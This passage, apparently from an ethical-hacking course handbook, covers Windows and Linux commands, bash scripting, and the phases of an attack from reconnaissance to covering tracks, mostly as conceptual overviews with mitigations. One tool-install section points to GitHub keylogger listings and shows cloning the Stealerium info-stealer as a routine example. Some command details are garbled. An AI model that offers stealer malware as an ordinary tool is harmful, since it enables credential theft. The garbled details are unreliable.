$ netdom join MYCOMPUTER /domain:example.local /userd:admin /passwordd:*

Output:
The machine account password was successfully reset.
The command completed successfully.

18. Command: route print

Description: Displays the system's routing table in detail.

Example:
$ route print

Output:

28/129
IPv4 Route Table
==============================================================
=====
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.1.1 192.168.1.10 25

19. Command: nbtstat

Description: Displays NetBIOS over TCP/IP statistics and the status of current connections.

Example:
$ nbtstat -a 192.168.1.10

Output:
Local Area Connection:
Node IpAddress: [192.168.1.10] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status


---------------------------------------------
MYCOMPUTER <00> UNIQUE Registered

20. Command: ipconfig /flushdns

Description: Clears and resets the DNS resolver cache.

Example:
$ ipconfig /flushdns

Output:
Successfully flushed the DNS Resolver Cache.

21. Command: ipconfig /release

Description: Releases the current DHCP configuration for all network adapters.

Example:
$ ipconfig /release

Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 0.0.0.0
Subnet Mask . . . . . . . . . . . : 0.0.0.0
Default Gateway . . . . . . . . . :

22. Command: ipconfig /renew

Description: Requests a new DHCP configuration for all network adapters.

29/129
Example:
$ ipconfig /renew

Output:
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : example.local
IPv4 Address. . . . . . . . . . . : 192.168.1.10
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1

23. Command: netsh firewall

Description: Configures the Windows Firewall settings.

Example:
$ netsh firewall set opmode mode=enable

Output:
Ok.

24. Command: netstat -a

Description: Displays all active network connections and listening ports.

Example:
$ netstat -a

Output:
Active Connections

Proto Local Address Foreign Address State


TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 192.168.1.10:49238 example.com:80 ESTABLISHED
UDP 0.0.0.0:123 *:*

Week 03

10. EHP View, Create and Edit Files

View, Create and Edit Files


1. View Files
>> cat

Description: The cat command is used to display the contents of a file on the terminal. It stands for
"concatenate" and is often used for displaying small files or combining multiple files.
30/129
Example:
$ cat example.txt
Hello, this is an example file.
This file contains a few lines of text.

Output:
Hello, this is an example file.
This file contains a few lines of text.

>> more

Description: The more command is used to view the contents of a file one screen at a time. It allows
scrolling through large files.

Example:
$ more longfile.txt

Output (first few lines):


This is a long file that will be displayed one screen at a time.
Press space to scroll down, 'q' to quit.

>> less

Description: Similar to more, but with more features, less allows backward navigation and is more
versatile for viewing large files.

Example:
$ less largefile.txt

Output:
This is a large file. You can scroll up and down with arrow keys, search with '/' and quit with 'q'.

>> head

Description: The head command is used to display the first few lines (default 10) of a file.

Example:
$ head example.txt

Output (first 10 lines):


Line 1: Example of head command output
Line 2: Displaying the first 10 lines of the file.
Line 3: This is just a sample text.

>> tail

Description: The tail command is used to display the last few lines (default 10) of a file. It’s often
used with the -f option to monitor log files in real-time.

Example:
$ tail example.log

31/129
Output (last 10 lines):
Error: Failed to load configuration.
Warning: Disk space low.

To follow a log file in real-time:


$ tail -f example.log

2. Create Files
>> touch

Description: The touch command is used to create an empty file or update the timestamp of an
existing file.

Example:
$ touch newfile.txt

Output: It will creates an empty file named newfile.txt

>> echo

Description: The echo command is used to create a file with content by redirecting output into a file.

Example:
$ echo "This is a new file" > file.txt

Output: Creates file.txt with the content:


This is a new file

>> cat (for creating files)

Description: You can also use cat to create a new file and write content into it. Press Ctrl+D to save
and exit.

Example:
$ cat > newfile.txt

Output:
(typing) This is some text.
(typing) Another line of text.
Press Ctrl+D to save.

After pressing Ctrl+D, newfile.txt will contain:


This is some text.
Another line of text.

>> nano / vim / vi (for creating files)

Description: These text editors can be used to create and edit files interactively.

nano is a simple command-line text editor.


vim/vi is a powerful text editor with many features.
32/129
Example:
$ nano newfile.txt

Output: Opens the nano editor, where you can type text. Press Ctrl+O to save, Ctrl+X to exit.

Or with vim:
$ vim newfile.txt

Output: Opens the vim editor. Press i to enter insert mode, type text, then press Esc, type :wq to save
and quit.

3. Edit Files
>> nano

Description: nano is a terminal-based text editor that is easy to use. It allows editing of files directly
in the terminal.

Example:
$ nano example.txt

Output: Opens example.txt in the nano editor. You can edit the file directly in the terminal, and save
with Ctrl+O, then exit with Ctrl+X.

>> vim/vi

Description: vim (or vi) is a more advanced text editor, suitable for both simple and complex text
editing tasks. It requires learning basic commands to use efficiently.

Example:
$ vim example.txt

Output: Opens example.txt in vim.


Press i to enter insert mode (to edit the text).
After editing, press Esc to exit insert mode.
Type :wq to save and quit.

>> sed
Description: sed is a stream editor that can modify file content directly from the command line,
making it useful for automated edits. It supports search and replace, insertions, and deletions.

Example:
$ sed -i 's/oldword/newword/' file.txt

Output:
Replaces all occurrences of "oldword" with "newword" in file.txt

To replace text without modifying the original file:


$ sed 's/oldword/newword/' file.txt

>> awk
33/129
Description: awk is a powerful text processing tool. It can perform actions on files based on patterns
and conditions.

Example:
$ awk '{ print $1 }' example.txt

Output:
(prints the first field of each line in the file `example.txt`)
Line1Field1
Line2Field1

--------------------------------------------------------------------------------------------------------

Additional Useful Commands for File Management

>> cp (Copy Files)

Description: Copies files or directories.

Example:
$ cp source.txt destination.txt

>> mv (Move/Rename Files)


Description: Moves or renames files and directories.
Example:
$ mv oldname.txt newname.txt

>> rm (Remove Files)


Description: Removes files or directories.
Example:
$ rm file.txt

>> chmod (Change File Permissions)


Description: Changes file permissions (read, write, execute).
Example:
$ chmod +x script.sh

4. Advanced File Viewing Techniques


>> grep

Description: The grep command is used to search for patterns within files. It can be combined with
other commands or used by itself to find specific text in large files.

Example:
$ grep "error" logfile.txt

Output:
Error: File not found.
Error: Network connection lost.

You can also use grep with the -r option to recursively search within a directory:
34/129
$ grep -r "keyword" /path/to/directory/

>> find

Description: The find command searches for files and directories within a specified location based on
various criteria (e.g., file name, modification time, size).

Example:
$ find /home/user/ -name "*.txt"

Output:
/home/user/file1.txt
/home/user/docs/file2.txt

To search for files modified within the last 7 days:


$ find /path/to/dir -mtime -7

5. File Compression & Archiving


>> tar

Description: tar is used to create, extract, or list archive files. Commonly used with compression
tools like gzip or bzip2 to compress archives.

Example (Create an archive):


$ tar -cvf archive.tar /path/to/directory/

Output:
directory1/
directory1/file1.txt

Example (Extract an archive):


$ tar -xvf archive.tar

Example (Compress with gzip):


$ tar -czvf archive.tar.gz /path/to/directory/

Example (Extract a .tar.gz file):


$ tar -xzvf archive.tar.gz

>> zip / unzip

Description: zip and unzip are used to create and extract .zip files.

Example (Create a zip file):


$ zip -r archive.zip /path/to/directory/

Example (Extract a zip file):


$ unzip archive.zip

>> gzip / gunzip

Description: gzip is used for file compression and gunzip is used to decompress .gz files.
35/129
Example (Compress a file):
$ gzip example.txt

Example (Decompress a .gz file):


$ gunzip example.txt.gz

-----------------------------------------------------------------------------------------

6. File Editing with Multiple Tools


>> vim - Editing Multiple Files

Description: You can open multiple files in vim using tabs or buffers for easier editing.

Example:
$ vim file1.txt file2.txt

Use :bn to switch to the next file, and :bp to go back to the previous file.

>> multitail

Description: multitail is useful for viewing multiple log files at the same time in a split-screen format.

Example:
$ multitail /var/log/syslog /var/log/auth.log

Conclusion
This expanded file management handbook provides a broader set of tools for working with files in
Linux. It includes methods for viewing, creating, and editing files.

As well as more advanced techniques for managing permissions, compressing, searching, and
backing up files. Familiarity with these commands will greatly enhance your productivity when
working in Linux environments.

By combining these commands, you can streamline tasks and automate workflows to increase
efficiency.

11. EHP Installing and Updating Tools

Installing and Updating Tools


For update and upgrade
>> sudo apt update && apt upgrade

If face any problem use this


# apt install corn-daemon-common

36/129
Note:
If need to install any tools search on search engines and read the installation process.
Some times some tools will found in GitHub. To find that search on search engine.

For example
install tools keylogger GitHub parrot Linux.
https://github.com/topics/keylogger

Now how to install guthub tools


Git clone (tool link)

Example:
>> git clone https://github.com/Stealerium/Stealerium.git

12. EHP Scripting with Bash

Scripting with Bash

Scripting with Bash: A Brief Overview

Bash (Bourne Again Shell) is a widely used command-line interpreter for Unix-like systems. Such as
Linux and macOS. It allows users to write and execute scripts files containing a series of commands.
That automates tasks and simplify system management.

Bash scripts are written in plain text and can perform a wide variety of tasks, such as system
administration, data processing, file management, and interacting with network resources.

Key Concepts of Bash Scripting:

1. Shebang (#!):
Every bash script begins with the "shebang" line (#!/bin/bash), which tells the system to execute the
script using the Bash interpreter.

Example:

#!/bin/bash

2. Variables:
You can store values in variables for later use. These can be strings, numbers, or results from
commands.

Example:

name="John"
echo "Hello, $name"

3. Commands:
Bash scripts execute commands just as you would in the terminal. This can include system
commands like ls, cp, mv, ifconfig, ip, and custom scripts or applications.

37/129
4. Control Flow:
Bash provides basic control flow structures such as if/else, for loops, while loops, and case
statements.

Example:

if [ $x -eq 5 ]; then
echo "x is 5"
else
echo "x is not 5"
fi

5. Functions:
You can define reusable blocks of code in functions. Functions can accept parameters and return
values.

Example:

greet() {
echo "Hello, $1"
}

greet "Alice" # Outputs: Hello, Alice

6.Comments:
Anything after a # symbol is considered a comment and is ignored by the shell. Comments are
useful for explaining the purpose of the script or specific lines of code.

Example:

# This is a comment

7. Input and Output:

Input: You can capture user input using the read command.

read -p "Enter your name: " username


echo "Hello, $username"

Output: Use echo or printf to display output.

echo "This is an echo statement."


printf "This is a formatted output.\n"

8. Pipes and Redirection:

Pipes (|) allow you to send the output of one command as input to another.

Redirection (>, >>) allows you to send output to a file instead of the terminal.

Example:

38/129
ls | grep "pattern" # Pipe output of `ls` into `grep`
echo "Hello World" > file.txt # Redirect output to file

9. Exit Status:
Each command in Bash returns an exit status (also known as a return code), where 0 means success
and any non-zero value indicates an error. This can be checked using $?.

Example:

echo "This will succeed"


echo $? # Outputs: 0

ls non_existent_file
echo $? # Outputs: 2 (command not found)

10. Loops:
Loops allow you to repeat actions multiple times. For example:

For loop:

for i in {1..5}; do
echo "Number $i"
done

While loop:

count=1
while [ $count -le 5 ]; do
echo "Count is $count"
((count++))
done

11. Error Handling:


It’s a good practice to check for errors in scripts using conditional statements or using set -e to make
the script exit on any error.

Example:

set -e # Exit immediately if any command fails

Advantages of Bash Scripting:

• Automation: Bash scripts can automate repetitive tasks, saving time and reducing human error.

• Integration: Bash scripts can call and integrate with many other system tools and utilities, making
them extremely powerful.

• Portability: Bash scripts are portable across many Linux and Unix-like systems.

• Lightweight: Unlike more complex programming languages, bash scripts are lightweight and
execute quickly.

39/129
Use Cases for Bash Scripting:

• System Administration: Automating backups, monitoring system resources, managing users.

• File Management: Renaming, moving, deleting, or organizing files in bulk.

• Networking: Automating tasks such as network configuration, testing connectivity, and managing
network interfaces.

• Data Processing: Filtering, sorting, and transforming text files or logs.

• Installation/Deployment: Automating the installation of software or setting up environments.

Here’s a simple bash script


that includes the commands you mentioned. The script will execute each of them
sequentially and display the network interface details, routing information, and ARP
cache.

#!/bin/bash

# Displaying information about network interfaces using ifconfig


echo "Displaying network interfaces with ifconfig:"
ifconfig
echo ""

# Displaying network interfaces with ip a


echo "Displaying network interfaces with ip a:"
ip a
echo ""

# Displaying wireless interfaces information using iwconfig


echo "Displaying wireless interface information with iwconfig:"
iwconfig
echo ""

# Displaying neighbor information (ARP table) using ip n


echo "Displaying ARP table with ip n:"
ip n
echo ""

# Displaying ARP cache using arp -a


echo "Displaying ARP cache with arp -a:"
arp -a
echo ""

# Displaying routing table using ip r


echo "Displaying routing table with ip r:"
ip r

40/129
echo ""

# Displaying routing table with route


echo "Displaying routing table with route:"
route

Instructions to use:

1. Create a new script file: Save the above code in a new file, for example, network_info.sh.

2. Make it executable: Run the following command to make the script executable:

>> chmod +x network_info.sh

3. Run the script: Execute the script with:

>> ./network_info.sh

Conclusion

Bash scripting is an essential skill for system administrators, developers, and power users who work
with Unix-like systems. It enables users to efficiently automate tasks, manage files, and interact with
the operating system, saving time and effort.

By understanding how to write and execute bash scripts, you can streamline your workflows and
ensure that repetitive tasks are handled automatically.

Week 04 Footprinting for Ethical Hacking

13. EHP Passive Recon (Reconnaissance Overview)

Passive Recon (Reconnaissance Overview)


The five stage of Ethical Hacking

1. Reconnaissance

Reconnaissance refers to the process of gathering information about a target, often for the purpose
of conducting an attack, security testing, or intelligence collection.

In the context of cybersecurity and ethical hacking, reconnaissance is a critical first step in
identifying potential vulnerabilities in a system or network before launching an attack or penetration
test.

41/129
Reconnaissance can be classified into two main types:

• Active
• Passive

Active Reconnaissance:

Active reconnaissance involves directly interacting with a target system or network to gather
information. In this approach, the attacker or security tester sends requests or queries to the target,
and the target responds with data that can be analyzed for vulnerabilities.

This type of recon can include actions like port scanning, banner grabbing, and other forms of direct
probing. Active recon is typically more risky because it can alert the target to the presence of the
attacker or tester.

Examples of Active Reconnaissance:

• Port scanning (e.g., using tools like Nmap)


• DNS interrogation
• Tracerouting
• Banner grabbing
• Service version detection

Passive Reconnaissance:

Passive reconnaissance, involves gathering information about a target without directly interacting
with it. This approach relies on publicly available data.

Such as information on websites, social media, DNS records, or other open-source intelligence
(OSINT) sources. Since there is no direct interaction with the target, passive recon is less likely to be
detected by the target.

Examples of Passive Reconnaissance:

• Searching through public records, WHOIS data, and DNS records


• Scanning social media platforms for employee or organizational details
• Analyzing open-source intelligence (OSINT) like news articles or domain registrations
• Examining websites, IP addresses, and network configurations through external tools

In summary, active recon involves engaging directly with the target to retrieve information, while
passive recon involves collecting information through observation without direct interaction with the
target system.

Reconnaissance in the Context of Penetration Testing:

For penetration testers, reconnaissance is the initial phase of the engagement. It helps testers
understand the target environment and scope out potential attack vectors.

Ethical hackers perform both active and passive reconnaissance (following legal and ethical
guidelines) to map out the attack surface and identify vulnerabilities before attempting exploitation.

Steps in a Typical Reconnaissance Phase:

42/129
• Planning: Understanding the scope and objectives of the test, which systems or services are in-
scope, and gathering publicly available information (e.g., domain names, email addresses).

• Reconnaissance (Active & Passive): Collecting further information about the systems involved
using tools and techniques for OSINT gathering, network mapping, and scanning.

• Vulnerability Identification: Based on the information collected, identifying potential vulnerabilities


that can be targeted in later stages of the penetration test.

Reconnaissance in Military or Espionage Context:

Reconnaissance is also a military term used to describe the act of gathering intelligence on an
enemy or area of interest, typically before an operation or engagement.

In espionage, it involves covertly acquiring data about a target, such as enemy movements,
resources, or capabilities, without being detected.

Reconnaissance in General:
More broadly, reconnaissance refers to any process of exploring or surveying an area or subject to
gather information, whether for military, business, or other purposes.

Conclusion:

Reconnaissance is a foundational phase in both offensive and defensive cybersecurity, as it sets the
stage for understanding the target environment. Whether done actively or passively, effective
reconnaissance can help identify security gaps.

Allowing defenders to fortify defenses or allowing attackers to find points of weakness. It’s an
essential process for anyone involved in cybersecurity, ethical hacking, or even general intelligence
gathering.

2. Scanning & Enumeration (Nmap, Nikto Nessus)

Scanning and enumeration are two crucial stages in the process of network security assessment,
penetration testing, or cyberattacks. Both are part of the reconnaissance phase and focus on
gathering more specific and detailed information about a target network or system.

These processes help an attacker or penetration tester identify the systems, services, and potential
vulnerabilities that may exist within a network.

Scanning

Scanning is the process of systematically probing a target system or network to gather information
about the devices, open ports, services, and potential security weaknesses. It involves sending
requests or probes to a target system and analyzing the responses to build a map of the network or
device.

There are different types of scanning techniques, each serving specific purposes.

43/129
Types of Scanning:

Port Scanning:

This is one of the most common scanning techniques. It involves identifying open ports on a target
system. Open ports can provide clues about the services running on the system (e.g., HTTP on port
80, SSH on port 22). Attackers can use this information to find vulnerabilities in services running on
these ports.

Tools: Nmap, Netcat, Masscan, Nikto, Nessus

Common Port Scan Types:

TCP Connect Scan: Establishes a full TCP connection to the target system to see if the port is open.

SYN Scan: Only sends a SYN packet to the target, which can be used to determine if a port is open
without completing the connection (more stealthy).

FIN Scan: Sends a TCP FIN packet to a port to check if it’s open (stealthy scan method).

Network Scanning:

This is used to discover devices on a network. It typically involves identifying the IP address range of
the target and then probing each address to identify live systems (hosts).

Tools: Nmap, Angry IP Scanner, Netdiscover

Vulnerability Scanning:

This type of scan attempts to detect vulnerabilities in a system by matching known vulnerabilities
(usually from databases such as CVE Common Vulnerabilities and Exposures) against the target's
services, operating systems, and configurations.

Tools: Nessus, Acunetix, Qualys, Nexpose

Operating System Fingerprinting:

This type of scan tries to identify the operating system running on a target system by analyzing the
responses to network traffic. Different operating systems (e.g., Windows, Linux) respond differently
to certain types of network traffic.

Tools: Nmap (OS detection), Xprobe2

Scanning Techniques in Action:

Network Discovery: Scanning helps identify active devices (IP addresses, routers, firewalls) on the
network and how they are connected.

Service Discovery: Scanning identifies which services are running on open ports (e.g., HTTP, FTP,
SSH, SMB).

Vulnerability Identification: By scanning for known vulnerabilities in services or devices, testers can

44/129
locate potential attack vectors.

Enumeration

Enumeration is a deeper, more detailed stage of information gathering that occurs after scanning. It
involves actively collecting information from a system or network, focusing on gathering specific
details about the services, users, systems, and network resources that are available.

Enumeration goes beyond just identifying open ports and services and aims to extract more
granular information, such as usernames, group memberships, shares, or version numbers.

Types of Enumeration:

Service Enumeration: After scanning a network for open ports, the next step is to enumerate the
specific services running on those ports. This includes identifying:

Service name (e.g., HTTP, FTP)

Service version

Configuration details of the service

Tools: Nmap (service version detection), Netcat, Banner Grabbing

SMB Enumeration: In the case of Windows-based networks, SMB (Server Message Block)
enumeration is important for discovering shared folders, network shares, user lists, and more.

Tools: SMBclient, Enum4linux, Netview, Nmap (SMB scripts)

NetBIOS Enumeration: NetBIOS enumeration is used in Windows environments to find machine


names, user names, group memberships, and shares.

Tools: NetbiosScan, Nmblookup, Enum4linux

DNS Enumeration: This involves querying DNS servers to retrieve records like A records (IP
addresses for domains), MX records (mail servers), NS records (nameservers), and more. DNS
enumeration can reveal subdomains, which can be useful for identifying additional attack surfaces.

Tools: dnsenum, Fierce, Nmap (DNS scripts)

LDAP Enumeration: LDAP (Lightweight Directory Access Protocol) is often used to access and manage
directory services in networks. LDAP enumeration allows attackers to discover details about users,
groups, and organizational structures in a network.

Tools: ldapsearch, Enum4linux (for Linux/Windows), JXplorer

NFS Enumeration: In Unix/Linux environments, NFS (Network File System) enumeration helps identify
shared resources like file systems and directories.

Tools: showmount, Nmap (NFS scripts)

Email Enumeration: This type of enumeration identifies valid email addresses associated with a

45/129
target domain. Attackers can then use this information for spear-phishing attacks or other social
engineering tactics.

Tools: Harvester, Email Extractor, Nmap (scripts)

Enumeration Techniques in Action:

User Enumeration: Extracting valid usernames from a target system, which can be used for further
attacks like brute-forcing passwords.

Share Enumeration: Discovering network shares (files, printers, etc.) to gain access to sensitive data.

Configuration Information: Extracting detailed configuration information from services (e.g.,


database version numbers, web server types) to identify potential vulnerabilities.

Key Differences Between Scanning and Enumeration

Aspect Scanning
Purpose Identifying open ports, active services, and
vulnerabilities
Depth Surface-level discovery of systems and services
Risk of Detection Can be more detectable (especially in active
scanning)
Tools Nmap, Masscan, Netcat, Nessus, OpenVAS

Typical Activities Port scanning, OS fingerprinting, vulnerability


scanning

Conclusion

Scanning helps to map out a network or system by discovering active devices, open ports, and
running services.

Enumeration goes a step further by querying services to extract specific information about them,
such as usernames, shares, and configurations.

Both scanning and enumeration are essential steps in security assessments and penetration testing,
allowing security professionals to identify vulnerabilities and attack vectors. They are also key
stages for attackers in gathering detailed information needed to launch more focused and targeted
attacks.

3. Gaining Access (Exploitation)

Gaining Access (also known as Exploitation) is a crucial phase in a penetration test, cyberattack, or
ethical hacking process. Where the information collected during reconnaissance, scanning, and
enumeration is used to exploit identified vulnerabilities.

To gain unauthorized access to a target system or network. This phase often marks the transition
from passive or preparatory activities to active exploitation of weaknesses.

46/129
Exploitation: Overview

Exploitation is the act of leveraging discovered vulnerabilities (such as open ports,


misconfigurations, unpatched software, weak passwords, etc.) to gain unauthorized access to a
target. This phase involves deploying tools, techniques, and exploits that allow an attacker or tester
to execute code, escalate privileges, and gain control over a target system.

The goal is to exploit a vulnerability to execute malicious code or take control of a system in some
way, either to perform further attacks or to assess the security posture of the system.

Types of Exploits

Exploitation can involve several types of attacks depending on the nature of the vulnerability. These
can range from exploiting open ports, weak services, software flaws, to social engineering attacks.
Here are the primary types:

Remote Exploits:

These involve attacks where the attacker does not need physical access to the target system. They
exploit vulnerabilities over a network connection (e.g., via the internet or a local network).

Examples:

Buffer Overflow Exploits: Attacking a system by sending more data than a program can handle,
causing it to overwrite adjacent memory and allowing an attacker to run arbitrary code.

Web Application Exploits: Exploiting vulnerabilities in web applications, such as SQL injection, cross-
site scripting (XSS), or remote code execution (RCE).

Local Exploits:

Local exploits occur when the attacker has some level of access to the target system. The attacker
can exploit a vulnerability from within the system (e.g., executing commands with higher privileges).

Examples:

Privilege Escalation: Exploiting a system flaw or misconfiguration to elevate a user’s privileges from
standard user to administrator or root.

Password Cracking: Gaining access by cracking weak or exposed passwords stored in a local system
file or database.

Social Engineering Attacks:

This form of exploitation leverages human psychology to trick individuals into providing sensitive
information or taking actions that lead to security breaches.

Examples:

Phishing: Sending fraudulent emails or messages to steal sensitive data (e.g., login credentials).

Pretexting: Pretending to be someone else (e.g., an IT admin) to trick employees into disclosing

47/129
information.

Baiting: Enticing a user to click on a malicious link or download an infected file.

Denial of Service (DoS) and Distributed Denial of Service (DDoS):

While primarily used for disruption rather than gaining access, these attacks involve exploiting
vulnerabilities to overwhelm a system or network, rendering it unavailable to legitimate users.

Password Attacks:

These attacks target weak or stolen passwords to gain unauthorized access to systems or accounts.
Exploitation often begins by cracking or guessing the password.

Examples:

Brute Force Attack: Trying all possible combinations to guess a password.

Dictionary Attack: Using a precompiled list of common passwords to guess the correct one.

Credential Stuffing: Using previously leaked passwords and usernames to try and access other
accounts where users might have reused their credentials.

Exploitation Methods and Tools

Various tools and techniques are used to exploit vulnerabilities and gain access to target systems.
Some of the most common methods include:

Exploiting Web Application Vulnerabilities:

SQL Injection (SQLi): An attacker inserts malicious SQL code into input fields to manipulate the
database.

Cross-Site Scripting (XSS): Injecting malicious scripts into webpages viewed by users to steal session
cookies or redirect to malicious sites.

Remote Code Execution (RCE): Exploiting vulnerabilities in web applications to execute arbitrary
commands on a server.

Tools:

SQLmap: Automates the process of detecting and exploiting SQL injection flaws.

Burp Suite: A popular tool for web vulnerability scanning and exploitation, including XSS and RCE.

Metasploit: A framework that includes many exploits, including those for web applications.

Exploiting Network Vulnerabilities:


SMB (Server Message Block) Exploits: Exploiting weak configurations or vulnerabilities in SMB to
gain access to shared files and system resources (e.g., EternalBlue, used in WannaCry).

RDP (Remote Desktop Protocol) Exploits: Exploiting weak configurations or vulnerabilities in RDP to
gain remote access to Windows machines.

48/129
Tools:

Metasploit: Provides several exploits for SMB and RDP vulnerabilities.

Hydra: A brute force tool used to guess passwords for various services, including SSH, RDP, and FTP.

Impacket: A collection of Python scripts that enable interaction with network protocols, such as SMB
and RDP.

Privilege Escalation:
After gaining initial access, attackers may exploit local vulnerabilities to escalate their privileges and
obtain full control of the system.

Methods:

Kernel Exploits: Exploiting bugs in the operating system kernel to gain root or administrator access.

Weak File Permissions: Exploiting improper file permissions to escalate privileges.

Sudo Caching Attacks: If sudo permissions are improperly configured, an attacker might escalate
privileges by running commands as a higher-privileged user.

Tools:

LinPEAS (Linux Privilege Escalation Awesome Script): A tool that automates the process of finding
privilege escalation opportunities on Linux systems.

Windows Exploit Suggester: A tool that suggests Windows privilege escalation techniques based on
the OS version.

Metasploit Framework:

Metasploit is a comprehensive framework for developing and executing exploits. It contains


numerous pre-written exploits for known vulnerabilities.

Metasploit can be used to automate the process of exploiting vulnerabilities, escalating privileges,
and maintaining access.

Common Metasploit Modules:

Exploit Modules: Used to launch exploits (e.g., exploiting a buffer overflow or RCE).

Post Exploitation Modules: Used to maintain access after exploiting a system, including creating
backdoors, keyloggers, and gathering credentials.

Auxiliary Modules: Used for scanning and gathering information but not directly exploiting
vulnerabilities.

Post-Exploitation

Once an attacker has successfully exploited a vulnerability and gained access, they often need to

49/129
maintain that access for further actions, such as data exfiltration, lateral movement, or privilege
escalation. This leads to the post-exploitation phase, which involves:

Maintaining Access: Establishing a backdoor or persistent access mechanism (e.g., creating a new
user account with admin privileges).

Covering Tracks: Deleting or modifying logs to hide evidence of the exploit.

Privilege Escalation: If the attacker only has low-level access, they may attempt to escalate their
privileges to gain full control.

Lateral Movement: Moving to other systems in the network to expand the compromise.

Data Exfiltration: Stealing sensitive information, such as documents, passwords, or credit card data.

Tools for Post-Exploitation:

Empire: A post-exploitation framework for PowerShell and Python.

Mimikatz: A popular tool for extracting clear-text passwords from Windows machines.

Netcat: Used to establish a remote shell and maintain access to compromised systems.

Conclusion
The exploitation phase is a critical step in both offensive security assessments (such as penetration
testing) and malicious attacks.

By exploiting vulnerabilities discovered during previous phases (scanning and enumeration), an


attacker gains access to a system, allowing them to further compromise the environment, steal data,
or carry out other malicious actions.

This phase is highly dependent on the types of vulnerabilities present and the specific attack
methods used, from network-based exploits to privilege escalation and social engineering tactics.

4. Maintain Access

When you're conducting reconnaissance (recon) for penetration testing, ethical hacking, or other
cybersecurity assessments, maintaining access is an important part of the process.

However, it’s important to clarify that maintaining access should only be done in legal, ethical, and
authorized contexts (such as penetration testing with client permission or within a bug bounty
program). Unauthorized access to systems is illegal and unethical.

Here’s a breakdown of ways attackers or penetration testers might maintain access during recon,
which is useful for understanding tactics that could be used to secure systems against intrusion:

A. Initial Access and Persistence


Before maintaining access, an attacker usually needs to gain initial access to a system. This could be
done through various methods such as:

Exploiting Vulnerabilities: Finding weaknesses in the system, whether it’s an unpatched vulnerability

50/129
or a misconfiguration.

Phishing: Social engineering techniques to gain credentials or malware to execute on a target


machine.

Credential Stuffing: Using stolen credentials to access a system.

Brute Force: Cracking weak passwords.

B. Creating Backdoors
Once access is gained, attackers or penetration testers will often establish persistent backdoors to
maintain access. Some of the methods include:

Web Shells: If an attacker can gain access to a web server, they might upload a web shell, which is a
script (usually PHP, ASP, etc.) that allows remote access to the server.

Reverse Shells: Attackers might use a reverse shell, where the target machine connects back to the
attacker's machine, allowing continuous access.

SSH Keys: Adding new SSH keys to the server to allow login without requiring passwords.

Trojans/Rootkits: Malicious software designed to stay hidden and maintain control of the
compromised system.

Tools used for persistence:

Metasploit: Metasploit's Meterpreter shell can be used to maintain access through payloads, as well
as to create a reverse shell, modify files, and run commands.

Cobalt Strike: A commercial penetration testing tool that provides advanced post-exploitation
features, including maintaining access and escalating privileges.

Empire: A post-exploitation framework that provides PowerShell-based agents for maintaining


access.

C. Escalating Privileges
To maintain access, an attacker often needs elevated privileges on a system to ensure they have
control over it and can persist:

Privilege Escalation: Attackers will attempt to escalate their privileges using tools or exploiting
known vulnerabilities in the system. This might involve exploiting a weakness to obtain root or
administrator access.

Windows Local Privilege Escalation (LPE): Exploiting misconfigurations or vulnerabilities in Windows


to gain elevated privileges.

D. Covering Tracks and Evasion


Maintaining access is not just about leaving backdoors, but also covering tracks so that the intrusion
is not easily discovered. Some tactics include:

Clearing Logs: Deleting or modifying log files to remove evidence of the attacker's presence.
Hiding Malicious Code: Using obfuscation techniques or disguising the payloads to make detection
more difficult.

51/129
Rootkits and Anti-Forensics: Tools that hide malicious activity from administrators or intrusion
detection systems (IDS).

E. Remote Access and Control


To ensure long-term access, attackers might use remote access tools or C2 (Command and Control)
infrastructure:

VPN or Proxy Setup: Configuring a VPN or proxy to route traffic through, which would obscure the
attacker’s real location and make it harder for defenders to detect the source.

C2 Servers: Setting up C2 infrastructure that allows the attacker to send commands to compromised
systems. Cobalt Strike, for example, often uses C2 infrastructure to control and manage
compromised hosts.

F. Using Persistent Services


Attackers may install or modify system services to ensure their access is maintained even after a
reboot:

Creating New User Accounts: Adding new user accounts or modifying existing ones with elevated
privileges.

Install Persistent Services/Programs: Some attackers might install backdoors as system services or
create scheduled tasks that execute malicious programs regularly.

Modify Startup Files: Ensuring that a malicious program or backdoor is executed when the system
starts.

G. Automating Recon and Exploits


Once access is established, attackers or testers will often automate tasks to collect more information
or exploit vulnerabilities. Tools that facilitate automation of access maintenance include:

AutoRecon: A tool for automating reconnaissance, which can be useful for systematic enumeration
of a target.

BloodHound: A tool for Active Directory enumeration that can help attackers maintain access to
critical systems through privilege escalation.

H. Using Alternate Communication Channels


Attackers sometimes rely on non-traditional methods of communication to maintain access:

DNS Tunneling: Using DNS queries and responses to exfiltrate data or receive commands, bypassing
network security monitoring.

ICMP Tunneling: Sending data via ICMP packets (ping requests), a method useful for bypassing
firewalls that block typical traffic.

I. Data Exfiltration & Exploitation


After securing access, attackers may want to exfiltrate sensitive data or use it for further
exploitation. This may involve:

Data Exfiltration: Using secure methods like encrypted tunnels or steganography to avoid detection
while transferring stolen data.

52/129
Lateral Movement: Moving from one system to another in the same network to expand the reach
and control within an organization.

Mitigation Strategies to Prevent Access Maintenance:

Regular System Audits: Regular vulnerability assessments, system hardening, and patch
management can help mitigate the risk of an attacker gaining initial access.

Strong Authentication: Multi-factor authentication (MFA) can make it harder for attackers to gain
control over user accounts.

Endpoint Detection & Response (EDR): Tools that monitor and respond to suspicious activity on
endpoints, looking for signs of backdoors or malicious activity.

Network Monitoring: Tools that look for unusual network traffic patterns, such as communication with
C2 servers or DNS tunneling attempts.

Incident Response Plan: Ensure the ability to detect, contain, and respond to incidents rapidly.
Automated detection systems like SIEM (Security Information and Event Management) are essential
for real-time visibility.

Again, this is all assuming you’re conducting security research or penetration testing in an
authorized and ethical manner. Always ensure you have proper authorization before conducting
recon or attempting to maintain access to any system.

5. Covering Tracks

Covering tracks refers to the techniques used by attackers or penetration testers to erase or
obscure evidence of their activities to avoid detection. This is done to maintain access and avoid
raising alarms. Here are the key methods used:

Clearing Logs:

Delete or modify system logs (e.g., event logs, access logs) to remove traces of exploitation or
suspicious activity.

Tools like logcleaner or manual editing can be used to clear logs in Linux/Windows systems.

File and Process Hiding:

Hiding files or processes that are running on the system to prevent detection by security tools.

Rootkits or advanced malware can alter file and process visibility.

